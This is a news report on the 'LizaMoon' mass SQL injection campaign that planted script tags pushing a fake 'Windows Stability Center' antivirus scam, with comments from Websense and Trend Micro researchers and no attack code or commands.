Security researchers are watching a mass SQL injection attack that is quickly spreading throughout the web, possibly already compromising over one million URLs by Friday afternoon. The attack injects a line of code into compromised sites than will trigger malicious pop-up ads.
Those affected may see a popup appear that informs them that there is malware on their computer and urges them to use a web-based antivirus program called “Windows Stability Center.” However, first the victim is asked to pay for the scan, which obviously would do nothing more than install malware on the users computer.
Not all antivirus software will detect this correctly as malware: a blog post on Friday indicated that less than half of antivirus applications that Websense tracks were correctly identifying it. Websense was first to make note of the attack on March 29.
“LizaMoon” — the name given to the attack — was initially thought to have affected some 28,000 sites. Since then the attack has spread quickly, and had even affected some legitimate Apple iTunes catalog links. It should be noted that Apple itself is not being attacked, rather the RSS/XML feeds for podcasts listed on the site.
When Apple picks up these feeds it encodes the script tags, thus making them non-executable. Websense senior manager of security research Patrik Runald applauded Apple for the move as it was obviously helping to limit the damage done from the attacks.
Apple’s not the only site that was affected — Runald believes that as many as 80 percent of sites now with the code are legitimate sites. Either way the firm is still unsure how it is happening, thus it could be very hard to stop from spreading even further, quite possibly making this one of the largest SQL injection attacks ever.
Trend Micro, also following the issue, noted that the affected sites are from no particular one category. “We saw compromised websites related to astronomy, clubs, hospitals, sports, funeral homes, electronics, and others,” it said.
The attack has been dubbed “LizaMoon” as the script called resides on the lizamoon.com domain. This single source was responsible for many of the code injections at the beginning of the attack, however Runald noted that new sites were now apparently hosting the attack code as well.